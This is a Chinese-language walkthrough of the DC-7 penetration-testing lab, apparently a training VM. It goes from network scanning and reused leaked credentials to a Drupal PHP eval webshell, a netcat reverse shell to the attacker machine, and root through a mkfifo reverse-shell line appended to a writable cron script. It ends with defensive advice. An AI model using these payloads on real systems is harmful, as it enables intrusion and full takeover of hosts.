DC-7 靶场渗透测试详细解析<\/h1>

环境准备<\/h2>

攻击机<\/strong>：Kali Linux (IP: 192.168.200.14)<\/li>
靶机<\/strong>：DC-7 (初始IP未知)<\/li>

网络配置<\/strong>：攻击机和靶机需处于同一网络下<\/li> <\/ul>
信息收集阶段<\/h2>
1. 发现靶机IP<\/h3>
使用以下方法探测网段内存活主机：<\/p>
# 方法1: arp扫描<\/span> <\/span><\/span>arp-scan -l <\/span><\/span> <\/span><\/span># 方法2: nmap ping扫描<\/span> <\/span><\/span>nmap -T4 -sP 192.168.200.0\/24 -oN nmap200.sP <\/span><\/span> <\/span><\/span># 方法3: netdiscover<\/span> <\/span><\/span>netdiscover -i eth0 -r 192.168.200.0\/24 <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> nmap -p 1-65535 192.168.200.10 <\/span><\/span><\/code><\/pre>发现开放端口：<\/p> 80 (HTTP)<\/li> 22 (SSH)<\/li> <\/ul> 3. 网站指纹识别<\/h3> whatweb -v 192.168.200.10 <\/span><\/span><\/code><\/pre>确认网站使用Drupal CMS<\/p> 初始访问获取<\/h2> 1. 社会工程学利用<\/h3> 通过网站提示信息"DC-7引入了一些'新'概念..."，结合搜索发现GitHub账户：<\/p> 获取数据库凭据：用户名：dc7user<\/li> 密码：MdR3xOgB7#dW<\/li> 数据库名：Staff<\/li> <\/ul> <\/li> <\/ul> 2. SSH登录<\/h3> ssh dc7user@192.168.200.10 <\/span><\/span><\/code><\/pre>3. 内部信息收集<\/h3> 在dc7user家目录发现：<\/p> backups文件夹（含.gpg加密文件）<\/li> mbox文件（包含脚本路径信息）<\/li> <\/ul> 关键脚本位置：<\/p> \/opt\/scripts\/backups.sh <\/span><\/span><\/code><\/pre>脚本内容显示：<\/p> 数据库备份路径：\/home\/dc7user\/backups\/website.sql<\/li> 网站数据备份路径：\/home\/dc7user\/backups\/website.tar.gz<\/li> Drupal密码重置命令： drush user-password admin --password=<\/span>"new_pass"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 权限提升路径<\/h2> 1. 重置Drupal管理员密码<\/h3> cd \/var\/www\/html\/ <\/span><\/span>drush user-password admin --password=<\/span>"123456"<\/span> <\/span><\/span><\/code><\/pre>2. 登录Drupal后台<\/h3> 访问：http:\/\/192.168.200.10\/user\/login 使用凭据：admin\/123456<\/p> 3. 植入PHP代码<\/h3> 由于Drupal 8默认不支持PHP，需先安装PHP模块：<\/p> 下载模块：https:\/\/ftp.drupal.org\/files\/projects\/php-8.x-1.0.tar.gz<\/li> 安装并激活PHP模块<\/li> 在Basic page中添加PHP代码： <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST[123<\/span>]); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> ### 4. 获取Webshell 使用中国蚁剑连接网站，获取www-data权限 ### 5. 反弹Shell 在Kali监听： ```bash nc -lvvp 6666 <\/code><\/pre> 在靶机执行：<\/p> nc -e \/bin\/bash 192.168.200.14 6666<\/span> <\/span><\/span><\/code><\/pre>升级交互式Shell：<\/p> python -<\/span>c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>特权提升<\/h2> 1. 利用定时任务<\/h3> 发现\/opt\/scripts\/backups.sh：<\/p> 属组：www-data<\/li> 定时执行<\/li> <\/ul> 2. 植入反弹Shell代码<\/h3> echo "rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f | \/bin\/sh -i 2>&1 | nc 192.168.200.14 8899 >\/tmp\/f"<\/span> >> backups.sh <\/span><\/span><\/code><\/pre>3. 监听新端口<\/h3> 在Kali执行：<\/p> nc -lvvp 8899<\/span> <\/span><\/span><\/code><\/pre>等待计划任务执行后获取root shell<\/p> 关键点总结<\/h2> 信息收集<\/strong>：通过社会工程学获取初始凭据比暴力破解更有效<\/li> 权限提升路径<\/strong>：利用已知凭据获取SSH访问<\/li> 通过脚本分析发现密码重置方法<\/li> 利用Drupal后台功能植入Webshell<\/li> 利用可写定时任务脚本实现特权提升<\/li> <\/ul> <\/li> 防御建议<\/strong>：定期更换敏感凭据<\/li> 限制脚本文件的写入权限<\/li> 监控计划任务变更<\/li> 禁用不必要的CMS功能模块<\/li> <\/ul> <\/li> <\/ol> 此靶场展示了从信息收集到权限提升的完整渗透测试流程，强调了社会工程学和非传统攻击路径的重要性。<\/p>